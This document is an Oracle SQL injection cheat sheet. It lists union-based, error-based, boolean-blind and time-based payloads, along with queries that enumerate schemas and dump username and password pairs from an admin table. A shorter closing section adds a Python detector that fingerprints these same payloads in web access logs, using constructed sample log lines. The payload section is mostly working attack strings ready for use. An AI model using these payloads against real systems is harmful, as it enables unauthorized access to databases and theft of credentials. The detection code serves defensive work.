Comment markers:
-- followed by a space, /* multi-line comment */
Union-based injection:
' order by 5 # use order by to determine the number of columns.
Oracle is strict about data types, so null is used because it is compatible with any column type.
' union select null,null,null,null,null from dual
Then replace the displayed position with the SQL subquery that retrieves the sensitive information, for example:
' union select null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null from dual
Some useful queries:
1 Current user privileges (select * from session_roles)
2 Current database version (select banner from sys.v_$version where rownum=1)
3 Server egress IP (can be obtained with utl_http.request)
4 Server listening IP (select utl_inaddr.get_host_address from dual)
5 Server operating system (select member from v$logfile where rownum=1)
6 Server SID (select instance_name from v$instance)
7 Current connected user (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)
8 Current user (SELECT user FROM dual)
List database (owner) names:
union select null,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual
union select null,null,(select owner from all_tables where rownum=1 and owner not in ('SYS')),null,null,null,null,null from dual
List tables:
union select null,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual
union select null,null,(select table_name from user_tables where rownum=1 and table_name not in ('ADMIN')),null,null,null,null,null from dual
List columns (table name in upper case):
union select null,(select column_name from user_tab_columns where table_name='<table name>' and rownum=1),null,null,null,null,null,null from dual
union select null,(select column_name from user_tab_columns where table_name='<table name>' and column_name not in ('ID') and rownum=1),null,null,null,null,null,null from dual
Dump data:
union select null,(SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual
union select null,(SELECT USERNAME||':'||PASSWORD FROM ADMIN),null,null,null,null,null,null from dual # || must be URL-encoded (%7c%7c)
Additional queries
Current user:
SELECT user FROM dual;
List all users:
SELECT username FROM all_users ORDER BY username;
List databases (owners):
SELECT DISTINCT owner FROM all_tables;
List table names:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
List all columns of a table:
SELECT column_name FROM all_tab_columns WHERE TABLE_NAME='ADMIN';
Locate data files:
SELECT name FROM V$DATAFILE;
Error-based injection:
and 1=utl_inaddr.get_host_name((select user from dual))--+
and 1=ctxsys.drithsx.sn(1,(select user from dual))--+
and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --+
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null --+
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --+
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --+
and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --+
and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)--+
and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual) --+
and 1=utl_inaddr.get_host_name((select (select username%7c%7cpassword from admin) from dual))--+
Boolean-based blind injection:
Get the length:
and 6=(select length(user) from dual) --+
Test the character at a given position:
and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --+
Extract the content of given columns from a given table:
and 1=(select decode(substr((select <column1>||<column2> from <table>),1,1),'a',1,0) from dual)
Without decode:
and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97
The values can be brute-forced with Burp Suite.
Time-based injection:
The DBMS_PIPE.RECEIVE_MESSAGE function waits 10 seconds for data returned from the RDS pipe. By default the package can be executed with PUBLIC privileges. DBMS_LOCK.SLEEP(), by contrast, is a function that can be used inside a SQL statement.
Confirm the injection point:
and 1=dbms_pipe.receive_message('RDS', 10)--+
Adding a delay on top of decode:
and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',10),0) from dual) --+
and 1=(select decode(length(user),6,dbms_pipe.receive_message('RDS',10),0) from dual)--+
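From the defender's side, the Oracle-specific functions and views used throughout these notes (dbms_pipe.receive_message, utl_inaddr, sys.v_$version, the dbms_xdb_version calls, decode/substr probes) are distinctive enough to fingerprint in web access logs. The following detector is an added example, not part of the original notes; the log lines are constructed, and classify_request / scan_access_log are hypothetical names.

```python
import re
from urllib.parse import unquote_plus

# Oracle-specific SQLi fingerprints drawn from the payload families in the notes above,
# grouped by technique; matched case-insensitively after URL-decoding (%27 -> ', %7c%7c -> ||).
ORACLE_SQLI_SIGNATURES = {
    "union-based": [r"\bunion\s+(all\s+)?select\b.*\bfrom\s+dual\b"],
    "schema-enumeration": [
        r"\bsys\.v_\$version\b", r"\bsys_context\s*\(\s*'userenv'",
        r"\bfrom\s+(all_tables|user_tables|user_tab_columns|all_tab_columns|all_users)\b",
        r"\bfrom\s+(v\$logfile|v\$instance|v\$datafile|session_roles)\b",
    ],
    "error-based": [
        r"\butl_inaddr\.get_host_(name|address)\s*\(", r"\bctxsys\.drithsx\.sn\s*\(",
        r"\bdbms_xdb_version\.(checkin|makeversioned|uncheckout)\s*\(",
        r"\bdbms_utility\.sqlid_to_sqlhash\s*\(", r"\bordsys\.ord_dicom\.getmappingxpath\s*\(",
        r"\bxmltype\s*\(\s*chr\s*\(",
    ],
    "boolean-blind": [r"\bdecode\s*\(\s*(substr|length)\s*\(", r"\bascii\s*\(\s*substr\s*\("],
    "time-based": [r"\bdbms_pipe\.receive_message\s*\(", r"\bdbms_lock\.sleep\s*\("],
}
COMPILED = {tech: [re.compile(p, re.I) for p in pats]
            for tech, pats in ORACLE_SQLI_SIGNATURES.items()}
# First token is the client address; the request target is the token after the method.
REQUEST_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def classify_request(target):
    """Return the sorted technique labels whose fingerprints occur in the URL-decoded
    request target (path + query); an empty list means nothing matched."""
    decoded = unquote_plus(target)
    return sorted(t for t, pats in COMPILED.items() if any(p.search(decoded) for p in pats))

def scan_access_log(lines):
    """Yield (client_ip, request_target, techniques) for every parseable log line
    that matches at least one fingerprint; unparseable or clean lines are skipped."""
    for line in lines:
        m = REQUEST_LINE.match(line)
        techniques = classify_request(m.group(2)) if m else []
        if techniques:
            yield m.group(1), m.group(2), techniques

# Constructed sample access-log lines (not real traffic); the injected values are the
# payload shapes from the notes above, URL-encoded the way a browser or tool sends them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.jsp?id=3 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.jsp?id=3%27+union+select+null,null,(select+banner+from+sys.v_$version+where+rownum=1),null,null+from+dual-- HTTP/1.1" 200 1094',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news.jsp?id=3+and+1=dbms_pipe.receive_message(%27RDS%27,10)--+ HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /news.jsp?id=3+and+1=utl_inaddr.get_host_name((select+user+from+dual))--+ HTTP/1.1" 500 231',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /news.jsp?id=3+and+(select+ascii(substr(username%7c%7cpassword,1,1))+from+admin)=97 HTTP/1.1" 200 512',
]
```

Run `list(scan_access_log(SAMPLE_LOG))` to see the four flagged requests with their technique labels; for time-based probes, pairing these hits with a response-time field from the log makes the detection much stronger.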